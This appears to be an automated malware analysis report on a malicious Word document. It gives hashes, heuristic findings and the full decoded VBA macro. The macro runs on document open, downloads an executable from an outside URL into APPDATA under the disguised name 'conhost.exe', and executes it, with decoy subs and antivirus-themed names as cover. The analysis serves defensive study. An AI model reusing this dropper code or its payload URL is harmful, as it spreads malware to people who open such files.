Office (OLE) malware analysis — malicious · c86cfc32dd90fd30

MALICIOUS

Office (OLE)

46.5 KB Created: 2014-01-03 08:15:00 Authoring application: Microsoft Office Word First seen: 2015-10-13

MD5: bf425957bbcb59d1b32c306a90dc8e70 SHA-1: f9910dc8168d2e09d0dadad5753c767f2f8703f4 SHA-256: c86cfc32dd90fd303e4fa59e7dc13e5d2d7785db358e4457a7deaa25664e0edb

254 Risk Score

Heuristics 10

Reference to URLDownloadToFile API critical SC_STR_URLDOWNLOAD

Reference to URLDownloadToFile API
VBA macros detected medium 6 related findings OLE_VBA_MACROS

Document contains VBA macro code
Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA
Matched line in script
```
Shell Environ("APPDATA") & "\conhost.exe"
```
URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD

URLDownloadToFile in VBA
Matched line in script
```
                Alias "URLDownloadToFileA" (ByVal pCaller As Long, _
```
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
Sub AutoOpen()
```
Workbook_Open macro low OLE_VBA_WBOPEN

Workbook_Open macro
Matched line in script
```
Sub Workbook_Open()
```
Auto_Open macro low OLE_VBA_AUTO

Auto_Open macro
Matched line in script
```
Sub Auto_Open()
```
Environ() call (env variable access) low OLE_VBA_ENVIRON

Environ() call (env variable access)
Matched line in script
```
Mcfee 0, "http://ahliatradings.com/info/asetahlia.exe", Environ("APPDATA") & "\conhost.exe", 0, 0
```
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://ahliatradings.com/info/asetahlia.exe Referenced by macro
- http://schemas.openxmlformats.org/drawingml/2006/mainReferenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/bibliographyReferenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/customXmlReferenced by macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1452 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	1452 bytes
SHA-256: `fac4154025e5ec97ce85ff6f9a4c99272d10328d90958dc2ea3f30a27fc7a0d4`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Avira" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Declare Function Mcfee _ Lib "urlmon" _ Alias "URLDownloadToFileA" (ByVal pCaller As Long, _ ByVal szURL As String, _ ByVal szFileName As String, _ ByVal dwReserved As Long, _ ByVal lpfnCB As Long) As Long Sub Auto_Open() Truniazo End Sub Sub AutoOpen() Auto_Open End Sub Sub Workbook_Open() Auto_Open End Sub Sub R2y234yu324huh4321h234324lhlh234() mAG ASDA End Sub Sub Rub31321321ete() SDHUSDFH MAD End Sub Sub Rubense3() Hola ASD End Sub Sub Truniazo() On Error Resume Next Mcfee 0, "http://ahliatradings.com/info/asetahlia.exe", Environ("APPDATA") & "\conhost.exe", 0, 0 Shell Environ("APPDATA") & "\conhost.exe" End Sub Attribute VB_Name = "Módulo1" Attribute VB_Name = "Módulo2" Sub Rub33ete() SDHUSDFH MAD End Sub Sub R21321ete() SDHUSDFH MAD End Sub Sub Rub323() SDHUSDFH MAD End Sub Sub Rub31321321ete() SDHUSDFH MAD End Sub Sub Rubae() SDHUSDFH MAD End Sub

SHA-256: fac4154025e5ec97ce85ff6f9a4c99272d10328d90958dc2ea3f30a27fc7a0d4

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "Avira"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Declare Function Mcfee _
                Lib "urlmon" _
                Alias "URLDownloadToFileA" (ByVal pCaller As Long, _
                                            ByVal szURL As String, _
                                            ByVal szFileName As String, _
                                            ByVal dwReserved As Long, _
                                            ByVal lpfnCB As Long) As Long

Sub Auto_Open()
    Truniazo
End Sub



Sub AutoOpen()
    Auto_Open
End Sub
Sub Workbook_Open()
    Auto_Open
End Sub

Sub R2y234yu324huh4321h234324lhlh234()
 mAG ASDA
End Sub

Sub Rub31321321ete()
 SDHUSDFH MAD
End Sub

Sub Rubense3()
 Hola ASD
End Sub

Sub Truniazo()
On Error Resume Next

Mcfee 0, "http://ahliatradings.com/info/asetahlia.exe", Environ("APPDATA") & "\conhost.exe", 0, 0
Shell Environ("APPDATA") & "\conhost.exe"

End Sub

Attribute VB_Name = "Módulo1"

Attribute VB_Name = "Módulo2"
Sub Rub33ete()
 SDHUSDFH MAD
End Sub
Sub R21321ete()
 SDHUSDFH MAD
End Sub
Sub Rub323()
 SDHUSDFH MAD
End Sub
Sub Rub31321321ete()
 SDHUSDFH MAD
End Sub
Sub Rubae()
 SDHUSDFH MAD
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.